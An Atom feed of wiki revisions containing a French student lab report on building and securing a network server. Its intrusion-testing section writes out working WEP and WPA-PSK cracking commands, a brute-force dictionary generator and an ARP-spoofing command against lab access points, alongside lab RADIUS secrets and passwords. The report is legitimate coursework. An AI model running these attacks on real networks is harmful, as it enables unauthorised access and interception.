<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tmertz</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tmertz"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Tmertz"/>
		<updated>2026-05-12T20:55:05Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=55721</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=55721"/>
				<updated>2021-01-28T18:49:05Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;br /&gt;
&lt;br /&gt;
commande installation python :&lt;br /&gt;
 ansible -i clavaire.ini -m raw -a &amp;quot;apt install python -y&amp;quot; all --user root --ask-pass&lt;br /&gt;
&lt;br /&gt;
commande envoi clé ssh :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key=&amp;quot;{{lookup(&amp;quot;file&amp;quot;,&amp;quot;/root/.ssh/id_rsa.pub&amp;quot;)}}&amp;quot;' --user root --ask-pass all&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le message du jour, on crée un role &amp;quot;motd&amp;quot; qui va copier notre fichier dans /etc/motd sur notre autre machine. On installe également ntp et on ajoute la ligne pour avoir accès au server ntp.plil.info dans le fichier /etc/ntp.conf&lt;br /&gt;
&lt;br /&gt;
Dockerfile&lt;br /&gt;
&lt;br /&gt;
 FROM httpd&lt;br /&gt;
 COPY ./index.html /usr/local/apache2/htdocs/&lt;br /&gt;
 CMD [ &amp;quot;httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot; ]&lt;br /&gt;
&lt;br /&gt;
 docker build -t web .&lt;br /&gt;
&lt;br /&gt;
 docker run -d web&lt;br /&gt;
&lt;br /&gt;
fichier main.yml&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Install docker on host&amp;quot;&lt;br /&gt;
   hosts: Install_docker&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   vars :&lt;br /&gt;
           &amp;quot;ansible_distribution&amp;quot;: &amp;quot;Debian&amp;quot;&lt;br /&gt;
           &amp;quot;ansible_distribution_release&amp;quot;: &amp;quot;buster&amp;quot; &lt;br /&gt;
   roles:&lt;br /&gt;
           - role: geerlingguy.docker&lt;br /&gt;
 &lt;br /&gt;
 - name: &amp;quot;Setup Docker&amp;quot;&lt;br /&gt;
   hosts: HTTPD&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   roles:&lt;br /&gt;
           - role: HTTPD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il faut maintenant envoyer notre image docker sur notre seconde vm, pour cela on fait un repo docker local&lt;br /&gt;
 docker run -d -p 5000:5000 --restart always --name repo&lt;br /&gt;
et on push notre image&lt;br /&gt;
on peut ensuite (en acceptant les communication http : /etc/docker/daemon.json ) pull l'image sur la seconde vm&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=55720</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=55720"/>
				<updated>2021-01-28T18:19:20Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
